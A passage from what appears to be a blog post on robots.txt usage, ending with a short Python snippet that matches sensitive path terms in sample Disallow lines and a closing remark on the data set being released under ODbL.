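    + r')(?![A-Za-z0-9])'
)

def find_sensitive_terms(content: str) -> set:
    """Return the sensitive terms that appear as standalone tokens."""
    return set(SENSITIVE_RE.findall(content))

if __name__ == '__main__':
    sample = (
        'Disallow: /.git/\n'
        'Disallow: /secretary/\n'
        'Disallow: /beta/\n'
        'Disallow: /alphabet/\n'
        'Disallow: /wp-admin/install.php\n'
    )
    print(sorted(find_sensitive_terms(sample)))
```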


robots.txt is a fairly innocuous part of the web. It’s been interesting to see how popular websites (ab)use it, and which web crawlers are naughty or nice. Most of all this has been a great exercise for me in collecting data and analysing it using pandas and Jupyter.

The full data set is released under the Open Database License (ODbL) v1.0 and can be found on GitHub